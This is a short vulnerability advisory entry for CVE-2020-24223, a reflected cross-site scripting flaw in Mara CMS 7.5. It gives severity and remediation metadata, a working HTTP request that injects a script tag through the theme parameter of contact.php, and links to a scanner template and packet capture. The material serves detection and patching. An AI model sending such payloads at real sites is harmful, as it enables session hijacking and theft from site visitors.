| Title | Mara CMS 7.5 - Cross-Site Scripting |
|---|---|
| Author | pikpikcu |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Upgrade to the latest version of Mara CMS or apply the vendor-provided patch to fix the XSS vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.15272 |
| CVE ID | CVE-2020-24223 |
| CWE ID | CWE-79 |
| Tags | cve2020 cve mara xss edb mara_cms_project vuln |
Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters.
GET /contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.8
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-24223.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-24223.pcap
N/AN/A